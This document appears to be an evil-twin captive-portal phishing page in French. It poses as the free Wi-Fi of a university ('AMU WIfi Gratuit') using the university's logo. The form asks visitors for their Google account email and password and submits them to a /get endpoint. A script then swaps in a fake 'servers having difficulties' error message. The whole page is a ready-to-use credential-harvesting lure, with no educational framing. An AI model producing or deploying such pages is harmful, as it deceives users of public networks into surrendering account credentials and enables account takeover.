<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="908.8623657 33.8564758 700.3193359 240"><path d="M1010.583 71.049l-26.37 78.064h10.192l6.33-18.756h33.172l6.448 18.756h10.201l-26.375-78.064h-13.598zm-7.152 50.517l13.953-43.255 13.945 43.255h-27.898zm59.782-38.684h9.844v-14.18h-9.844v14.18zm0 66.231h9.844V92.03h-9.844v57.083zm69.274-57.083h-10.197l-13.601 20.98-13.593-20.98h-10.201l18.404 28.36-18.752 28.723h10.432l13.71-21.217 13.836 21.217h10.31l-18.866-28.722 18.518-28.361zm129.46-20.982l-22.51 60.367-22.5-60.367h-12.779l-2.695 78.065h9.727l1.524-63.296 19.927 53.213h13.597l19.923-53.213 1.528 63.296h9.728l-2.7-78.065h-12.77zm47.39 19.806c-6.091 0-11.549.668-16.938 2.074l1.057 7.854c4.45-.936 9.79-1.49 15.298-1.49 9.26 0 12.425 2.464 12.425 9.613v8.909h-15.238c-11.49 0-17.468 4.222-17.468 16.06 0 10.08 4.454 16.41 15.12 16.41 6.915 0 13.48-1.877 18.518-5.395l.588 4.224h8.32v-39.737c0-12.192-5.39-18.522-21.682-18.522zm11.842 46.304c-4.341 2.812-9.848 4.684-14.772 4.684-7.032 0-8.09-2.342-8.09-8.202 0-5.744 2.23-7.62 8.32-7.62h14.542v11.138zm34.318-37.16l-.583-7.968h-8.56v57.083h9.848v-39.385c4.685-3.283 10.899-7.27 16.292-9.849l-1.287-9.025c-5.627 2.347-11.487 5.86-15.71 9.143zm44.78 16.291c-9.615-2.342-9.732-3.514-9.732-9.844 0-5.16 1.176-7.153 9.614-7.153 4.689 0 11.02.705 15.821 1.646l.707-8.09c-4.69-1.29-10.668-1.994-16.176-1.994-15.003 0-19.692 4.807-19.692 15.356 0 11.838 1.29 14.768 15.47 18.286 11.489 2.812 11.956 3.518 11.956 9.613 0 6.096-1.52 7.733-10.547 7.733-4.924 0-11.372-.936-16.291-2.343l-1.293 7.737c4.571 1.76 12.308 3.048 18.168 3.048 16.297 0 19.692-5.395 19.692-16.527 0-11.368-1.287-13.366-17.698-17.468zm51.755-25.435c-16.996 0-22.388 9.496-22.388 21.334v17.115c0 12.892 5.743 20.98 22.624 20.98 7.15 0 14.768-1.288 20.157-3.281l-1.287-7.855c-6.214 1.645-12.427 2.695-18.052 2.695-11.137 0-13.597-3.631-13.597-12.657v-4.807h33.994v-11.955c0-11.838-4.576-21.569-21.451-21.569zm11.956 25.322h-24.499v-4.693c0-7.968 3.282-12.426 12.543-12.426s11.956 4.458 11.956 12.426v4.693zm22.395 32.937h9.85V92.03h-9.85v57.083zm0-66.23h9.85V68.701h-9.85v14.18zm28.602 66.23h9.843V67.296l-9.843 1.406v80.41zm28.6 0h9.848V67.296l-9.849 1.406v80.41zm65.597-24.735v-11.955c0-11.838-4.572-21.569-21.45-21.569-17 0-22.389 9.496-22.389 21.334v17.115c0 12.892 5.743 20.98 22.622 20.98 7.15 0 14.769-1.288 20.16-3.281l-1.29-7.855c-6.213 1.645-12.422 2.695-18.047 2.695-11.136 0-13.6-3.631-13.6-12.657v-4.807h33.994zm-33.995-12.895c0-7.968 3.283-12.426 12.544-12.426 9.26 0 11.955 4.458 11.955 12.426v4.693h-24.499v-4.693z" fill="#231f20"/><path d="M1147.129 216.179c-7.073 3.71-17.048 6.494-21.682 6.494-3.942 0-6.146-1.507-6.146-5.684v-45.682h-6.725v44.872c0 7.766 3.132 12.753 11.948 12.753 6.834 0 16.922-3.367 22.954-6.26l.465 5.102h5.911v-56.467h-6.725v44.872zm57.239-46.03c-6.834 0-16.926 3.362-22.954 6.259l-.462-5.1h-5.92v56.466h6.734v-44.868c7.07-3.71 17.044-6.498 21.679-6.498 3.941 0 6.145 1.511 6.145 5.683v45.683h6.725v-44.868c0-7.77-3.132-12.757-11.947-12.757zm29.57 57.625h6.725v-37.66h-6.725v37.66zm0-44.322h6.725v-12.401h-6.725v12.401zm44.502 39.564l-17.392-51.709h-6.842l19.133 56.467h10.32l19.125-56.467h-6.834l-17.51 51.71zm54.19-52.867c-15.883 0-21.098 8.928-21.098 20.523v17.74c0 12.287 5.097 20.52 20.982 20.52 6.843 0 14.264-1.276 19.486-3.132l-1.166-5.448c-5.558 1.51-12.057 2.664-17.85 2.664-11.25 0-14.727-4.29-14.727-14.377v-7.07h34.902v-10.897c0-11.595-4.642-20.523-20.528-20.523zm13.913 25.393h-28.286v-5.105c0-9.504 3.825-14.491 14.374-14.491 10.554 0 13.912 4.987 13.912 14.491v5.105zm29.696-15.65l-.345-8.585h-6.027v56.467h6.716v-40.581c5.457-3.59 11.948-7.88 17.859-10.433l-.807-6.612c-5.34 1.97-11.368 5.798-17.396 9.744zm47.444 16.229c-10.428-2.67-10.889-3.48-10.889-11.246 0-6.142 1.387-8.698 11.242-8.698 4.643 0 11.25.701 15.768 1.624l.697-5.684c-4.409-1.276-10.781-1.968-16.003-1.968-13.911 0-18.428 5.108-18.428 14.495 0 10.318 1.158 13.794 15.305 17.156 12.87 3.015 13.098 3.825 13.098 11.944 0 7.187-2.092 9.16-12.526 9.16-4.175 0-10.085-.815-14.954-2.317l-1.159 5.449c4.182 1.738 10.898 2.896 16.582 2.896 15.07 0 18.78-5.218 18.78-15.419 0-10.554-.93-13.219-17.513-17.392zm33.836-12.669h6.725v-12.401h-6.725v12.401zm0 44.322h6.725v-37.66h-6.725v37.66zm45.287-4.635c-5.8 0-6.49-2.091-6.49-7.078v-38.956h14.685l.697-5.798h-15.381v-12.32l-6.735.923v11.397h-10.896v5.798h10.896v39.654c0 8.924 3.83 12.173 12.753 12.173 4.065 0 7.254-.478 10.497-1.758l-1.277-5.219c-3.36 1.041-5.626 1.184-8.75 1.184zm61.172-21.57v-10.897c0-11.595-4.642-20.523-20.528-20.523-15.876 0-21.098 8.928-21.098 20.523v17.74c0 12.287 5.096 20.52 20.989 20.52 6.835 0 14.257-1.276 19.479-3.132l-1.167-5.448c-5.558 1.51-12.056 2.664-17.85 2.664-11.25 0-14.727-4.29-14.727-14.377v-7.07h34.902zm-34.902-11.132c0-9.504 3.83-14.491 14.374-14.491 10.554 0 13.921 4.987 13.921 14.491v5.105h-28.295v-5.105zm26.221-29.696l-2.006-5.772c-5.827 2.237-11.964 4.27-17.17 5.948l1.864 5.373c5.264-1.422 11.603-3.282 17.312-5.549z" fill="#4dc6f4"/><path d="M1188.708 132.556c-.138-.533-.36-1.148-1.02-1.55l-15.46-8.925-.71-.411c.236-.138.474-.275.713-.413l15.456-8.923c.66-.404.881-1.02 1.022-1.552a6.78 6.78 0 0 0 .162-1.57c0-.644-.062-1.132-.063-1.157l-.049-.388-.31-.233c-.091-.017-1.62-1.365-3.316-1.444-.304 0-.645.061-.968.246l-15.454 8.923-.714.412V82.328c-.1-1.3-1.04-1.841-1.732-2.34-.732-.47-1.417-.757-1.447-.77l-.36-.151-.357.152c-.029.014-.709.299-1.434.769-.683.497-1.615 1.048-1.71 2.34v33.245l-.716-.413-15.456-8.925a1.914 1.914 0 0 0-.966-.244c-1.698.077-3.224 1.427-3.317 1.442l-.31.234-.047.385c-.002.026-.065.515-.065 1.159.001.471.03 1.023.163 1.57.139.534.361 1.15 1.022 1.552l15.457 8.925.713.411-.712.411-15.46 8.924c-.66.403-.882 1.019-1.022 1.55a6.79 6.79 0 0 0-.16 1.572c0 .645.06 1.136.065 1.16l.047.385.31.236c.093.015 1.619 1.36 3.315 1.438h.014c.299 0 .632-.058.952-.24l15.458-8.925.714-.412v18.673c.1 1.3 1.04 1.84 1.73 2.34.732.47 1.42.755 1.448.767l.358.152.36-.152c.027-.012.707-.297 1.433-.767.683-.498 1.617-1.047 1.711-2.34l.002-17.851-.001-.823.713.411 15.458 8.925c.323.186.664.244.966.244 1.695-.078 3.222-1.425 3.315-1.441l.311-.235.047-.386a9.79 9.79 0 0 0 .064-1.158c-.001-.472-.03-1.024-.163-1.57z" fill="#fab20b"/><path d="M908.862 153.918c0-12.571 1.084-24.341 3.252-35.294 2.166-10.953 5.45-21.74 9.87-32.358 4.412-10.617 9.871-21.257 16.367-31.923 3.914-6.497 7.382-11.027 9.87-14.053 2.57-3.128 5.292-6.434 9.04-6.434 4.085 0 6.122 1.123 6.122 3.372 0 .752-1.917 5.267-5.748 13.558-3.834 8.285-7.435 16.968-10.807 26.046-3.375 9.082-6.499 20.409-9.365 33.984-2.879 13.575-4.312 27.946-4.312 43.102 0 14.993 1.411 29.196 4.245 42.61 2.83 13.406 6.843 25.028 10.468 34.854 3.626 9.826 6.46 18.639 10.08 26.424 3.626 7.786 5.44 12.014 5.44 12.68 0 2.248-2.038 3.37-6.123 3.37-3.83 0-6.459-3.827-9.04-6.74-2.583-2.92-5.872-7.579-9.87-13.999-6.58-10.988-12.018-21.587-16.307-31.79-4.29-10.206-7.555-20.807-9.804-31.802-2.253-10.992-3.378-22.863-3.378-35.607" fill="#1476c6"/></svg>
    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur AMU WIfi Gratuit.</h1>
            <h2 class='containersubtitle'> Connectez vous grace a votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
